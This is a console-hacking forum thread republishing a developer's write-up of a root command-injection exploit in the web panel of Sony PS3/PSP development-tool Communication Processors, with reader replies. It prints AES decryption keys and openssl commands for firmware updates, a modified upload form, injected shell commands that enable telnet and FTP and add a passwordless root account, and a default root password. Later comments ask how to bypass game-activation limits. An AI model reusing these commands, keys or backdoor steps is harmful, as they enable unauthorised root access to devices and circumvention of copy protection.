Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS3 CFW and Hacks       Thread starter PSXHAX       Start date Mar 3, 2016 at 11:29 PM       10      
Status
Not open for further replies.
Sony PS3 hacker Mathieulh published a PlayStation 3 and PSP Communication Processors Exploit today for other developers to examine followed by the Despertar Del Cementario and M33 source code (under GPLv3) for the M33 10th anniversary.

Download: Despertar Del Cementerio GIT / 3.90 M33 GIT

Sound interesting? Check out the PS3 and PSP Communication Processors Exploit details below!

Communication Processor

Hardware
  • CXD9790GG (I/O)
  • TCP-510 (Board ID on the DEH models such as DEH-R1040)
  • TCP-520 (Board ID on the DECR-1000)
(TCP-510 matches the TMU-510 motherboard, while TCP-520 matches the TMU-520 motherboard) The PSP DTP-T1000 unit also sports a communication processor but it does not come as a separate board, the hardware is integrated/soldered directly to the motherboard, unlike the PS3 CP, it does not run the firmware from RAM (the PS3 CP copies the firmware from ROM to RAM at boot so changes are, by default not persistent) and therefore writes files directly to flash.

CEB units feature a PCI slot capable of harboring a CP daughterboard (Sony used such setups as System Debuggers before DEH units came along), CP boards switched to a proprietary interface and shipped to 3rd parties starting with DEH-Rx

Software

De/Encrypt Communication Processor updates

This is how to decrypt/encrypt Playstation 3 Reference Tool Communication Processor updates. (use this knowledge wisely)

This was achieved by exploiting the communication processor firmware and gaining root privileges on the running Montavista Linux. The key for the CP update packages is located within the toolupdatedec binary located at /usr/local/sony/bin/toolupdatedec

The update packages are just tar.gz packages encrypted using AES256CBC Here is the syntax to decrypt them :

The first 16 bytes of the package is the IV, the Second 16 bytes is the hash of the decrypted package.

So use this Syntax after skipping the first 32 bytes of the file:
Type This
Code:
openssl aes-256-cbc -in reftool_cp_xxx.bin -K E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F -iv the_first_16_bytes_of_the_file -d > dec.tgz
PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary.

The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000
Type This
Code:
openssl aes-256-cbc -in psptoolupdate.bin -K A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB -iv the_first_16_bytes_of_the_file -d > dec.tgz
P.S. If you have any trouble extracting the tarballs, try using Linux.

- Mathieulh

Because a picture is worth a thousand words, here is one (below).

Proper De/Encrypting of CP Updates
Exploiting the Communication Processor

After initially deciding not to release the cgi exploit in case Sony may release yet another hardware based on the CXD9790GG MIPS processor, no such hardware (to my knowledge) ever came out; thus I am now documenting this exploit:

Editor's note: The following <html> code has been edited for a better experience through displaying on this wiki page. The following has ben replaced... (Roxanne (talk) - 03rd March 2016 - 21:50 GMT+1)
Code:
  <source lang="xml"> instead of <pre>
  <title>Save and load</title> instead of <title>Save & load</title>
  <div class="title">Save and load</div> instead of <div class="title">Save & load</div>
View here to look for the original code... (by Mathieulh)
Step 1 - The Development Tool Web panel

The first thing you want to do, assuming you already have your Development Tool properly setup, is to go to this page devtool/cgi-bin/admin/save_setting.cgi?lang=english (you will want to replace "devtool" by the ip/hostname of your Development Tool), you may also reach this page by simply going to the "Save & load" page of your tool's panel.

This page is actually the front end for a cgi script that can be used to save and/or load your development tool's configuration settings into/from a file. Once on the page, it is fairly easy to do a right click on your favorite web browser and save it as source, assuming you did not mistakenly save the top.cgi page instead, this is the result you should get:
Code:
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <title>Save and load</title>
  <link rel="stylesheet" href="/style.css">
</head>
<body>
<div class="title">Save and load</div>
<div class="abstract">Download of the current settings or upload of setting with a file.</div><br><hr>
<div class="contents">
<form action="save_setting.cgi?lang=english" method="post"
         enctype="multipart/form-data">
Save setting file
<table>
<tr>
  <th>
  Setting file
  </th>
  <td>
  <a href="/var/ps3tool.conf">
  ps3tool.conf
  </a>
  <br>
  (Right-click and then select a menu like [Save Target As] on your browser.)
  </td>
</tr>
</table>
<hr>
Upload setting file
<table>
<tr>
  <th>
  Setting file
  </th>
  <td>
  <input type="file" name="setting">
  </td>
</tr>
</table>
<div align="center">
  <input type="submit" name="confirm" value="Setting">
</div>
</form>
</div>
<hr>
<a href="/cgi-bin/contents.cgi?lang=english">
  Top
</a>
<!--
&nbsp;
<a href="/help/english/save_setting.html" target="_blank">
  Help
</a>
-->
</body>
</html>
Besides the obvious security hazard in the fact that the httpd service runs as root, the exploit itself still remains hidden unless you get the whole save_setting.cgi file and look into the save_setting_file and the rename_settingfile functions (I'll let you dig into these deeper in your own time)

Step 2 - Doing simple modifications

Assuming you have saved the right source to your computer, you then need, for this exploit to work, to perform small modifications to those

What you really want is this part :
Code:
  Setting file
  </th>
  <td>
  <input type="file" name="setting">
  </td>
Into this part:
Code:
  Setting file
  </th>
  <td>
  <input type="text" name="setting">
  </td>
</tr>
As you can see, the change is subtle, but it allows you input actual text instead of sending a file

Of course since you are not going to use this modified page from the actual Communication Processor's web panel, you need to perform a few more obvious changes to the page (you need to put the hard path to hyperlinks) So, change all the hyperlinks to their full path, for exemple <form action="save_setting.cgi?lang=english" method="post" becomes <form action="http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english" method="post"

To the lazy ones, this is what the result should look like (change the hyperlinks accordingly)
Code:
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <title>Save and load</title>
  <link rel="stylesheet" href="/style.css">
</head>
<body>
<div class="title">Save and load</div>
<div class="abstract">Download of the current settings or upload of setting with a file.</div><br><hr>
<div class="contents">
<form action="http://DEVTOOL.IP.HERE/cgi-bin/admin/save_setting.cgi?lang=english" method="post"
         enctype="multipart/form-data">
Save setting file
<table>
<tr>
  <th>
  Setting file
  </th>
  <td>
  <a href="http://DEVTOOL.IP.HERE/var/ps3tool.conf">
  ps3tool.conf
  </a>
  <br>
  (Right-click and then select a menu like [Save Target As] on your browser.)
  </td>
</tr>
</table>
<hr>
Upload setting file
<table>
<tr>
  <th>
  Setting file
  </th>
  <td>
  <input type="text" name="setting">
  </td>
</tr>
</table>
<div align="center">
  <input type="submit" name="confirm" value="Setting">
</div>
</form>
</div>
<hr>
<a href="http://DEVTOOL.IP.HERE/cgi-bin/contents.cgi?lang=english">
  Top
</a>
<!--
&nbsp;
<a href="/help/english/save_setting.html" target="_blank">
  Help
</a>
-->
</body>
</html>
Step 3 - Profit !

You should now have a place in which you can input text in the page itself, the exploit works as follows, any command you sent (by pressing on the "Setting" button) preceded by "; " (do not include the quotes) will run as root on the Communication Processor, so here are the obvious commands you need to input in order to gain telnet and ftp access as well as to add a root account to the unit:

Add a line to start telnet in inetd.conf (the line already exists in the original file but is commented)
Type This
Code:
; echo >>/etc/inetd.conf telnet   stream  tcp  nowait  root  /usr/sbin/tcpd   in.telnetd
Add a line to start ftpd in inetd.conf
Type This
Code:
; echo >>/etc/inetd.conf ftp   stream   tcp   nowait   root   /usr/sbin/tcpd   in.ftpd
Restart inetd to apply the above changes
Type This
Code:
; /etc/init.d/inetd restart
Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology
Type This
Code:
; echo >>/etc/passwd rt::0:0:root:/root:/bin/bash
You may also output files given the right path (if you don't want to mess with ftp) the below exemple creates a ls.txt file containing a listing of all files on the CP at the Development panel's root
Type This
Code:
; ls -alR /* > /usr/local/sony/www/html/ls.txt
While sending all these commands (by clicking on the "Setting" button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal.

Once you have dumped the development tool panel's files, or extracted those from updates, the exploit should be fairly obvious to you. Of course when this exploit was first discovered, we had no previous access to the files on the Communication Processor and had to initially take another route, which was to dump the Communication Processor's bootrom using hardware (the chip sits on a socket), discover and use the diagnostic panel/shell on it, find a way out of its sandbox and send (through very slow serial outputs) the content of the Communication Processor's memory (as it was running live), which incidentally contained a whole copy of the file system and allowed to look for an easier way in, eventually the toolupdatedec files from both the DTP-T1000 and TCP-520 (DECR-1000 CP) was dumped using this exploit, allowing to retrieve the keys and algorithms used to decrypt Communication Processor/Hardware Tool updates.
800px-CP_ROOT.jpg
 

Comments

he's been about. but i just had some direct messages with him. and he told me that if you wanted to root your own Debugging unit; this is how you do that. this isn't an exploit for OFW users.
wQxSscq.png


Though i am sure he would mind me sharing his DM's with me in the future.. i won't do it again. math.
 
he's been about. but i just had some direct messages with him. and he told me that if you wanted to root your own Debugging unit; this is how you do that. this isn't an exploit for OFW users.
wQxSscq.png


Though i am sure he would mind me sharing his DM's with me in the future.. i won't do it again. math.
This is a nifty little tool and has some nice benefits for those who use this aspect but for ofw it's very well documented on a specific website how it's done as even they use it themselves for all models.
There's some documentation PDFs on it
 
he's been about. but i just had some direct messages with him. and he told me that if you wanted to root your own Debugging unit; this is how you do that. this isn't an exploit for OFW users.
wQxSscq.png


Though i am sure he would mind me sharing his DM's with me in the future.. i won't do it again. math.

I was just messing around about Math. I know who he is & that he's not been completely dead to the scene. Just having some fun! :)
 
Hey I just have a question.. I did a data transfer from ps3 system to another one and as u know u need to activate it so u can play the purchesed games and now it's only 2 systems cud be activated

So is there anyway to bypass that like decrypting or something like that specially I have been messing around with dumps that I took using e3 flasher and tried to edit them via hxd hex editor and sadly none worked

Pls pls pls help
Thx in advance
 
There are some encryption / decryption tools linked HERE, but honestly most are for developers and as misiozol mentions below that post there are multiple layers of encryption that only add to the mess. :sick:
 
What is missing is the actual tools themself we have them as they were the first for decr1000 n believe we also have 2000 aswel. But there is a cheat man's way of doing this if you have extensive knowledge with fpga systems and know what hw to use which is used for embedding

Vertex 5 440
http://www.xilinx.com/products/intellectual-property/ppc440_virtex5.html

A big part of the decryption/encryption is having the actual curve n correct length as what is being used is not what it seems n only partial. Only a select few have the correct length n curve
 
Ok thx a lot and I'll let u know what I got once I do it. Hopes it will work

Hey does the ps3's private key that discovered by failoverflow team still working on slim consoles???

Thx in advance
 
I think it depends on what you're trying to do, from quick digging for example it appears that 3K PS3 Slim models had an updated LV0 version (lv0.2) but whether this has bearing on the private keys found by fail0verflow hopefully a [USERGROUP=8]@Developer[/USERGROUP] will know the answer to.

Until then, here's a link to search through the wiki PS3 keys page that may be of use: http://www.psdevwiki.com/ps3/Keys
 
Status
Not open for further replies.
Back
Top